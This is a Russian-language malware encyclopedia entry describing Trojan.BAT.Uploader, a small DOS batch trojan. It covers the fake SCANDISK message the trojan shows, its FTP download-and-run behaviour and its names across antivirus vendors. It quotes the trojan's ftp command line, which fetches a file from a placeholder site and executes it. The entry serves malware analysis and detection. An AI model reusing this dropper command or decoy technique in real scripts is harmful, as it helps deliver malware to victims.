Троянская программа. Является пакетным файлом DOS.
Размер троянца — около 400 байт.
Деструктивная активность
При запуске троянской программы появляется окно консоли с сообщением:
MS-DOS SCANDISK
found 27,4951 lost bytes
fixing error(s)...
lost cluster(s) fixed
Троянец создает файл с именем C:\$.tmp, который содержит сценарий работы для утилиты FTP, после чего запускает эту утилиту с параметрами:
ftp -v -i -n -s:c:\$.tmp <адрес_сайта для загрузки файла> c:\$$.tmp
После этого в папку %WinDir% скачивается файл, имя которого указано в сценарии работы и запускается. После этого троян удаляет файлы:
C:\$.tmp
c:\$$.tmp
И завершает свою работу.
Другие названия
Trojan.BAT.Uploader («Лаборатория Касперского») также известен как: Uploader (McAfee), Trojan Horse (Symantec), Troj/Uploader (Sophos), Trojan:Uploader (RAV), BAT_UPLOADER.A (Trend Micro), TR/Bat.Uploader (H+BEDV), Win:TrivTroj-B (ALWIL), BAT.Trojan.Uploader.A (SOFTWIN), Trojan.Bat.Uploader (ClamAV), Trj/SD-Rux (Panda), BAT/Uploader (Eset)
Собираем и анализируем опыт профессионалов ИБ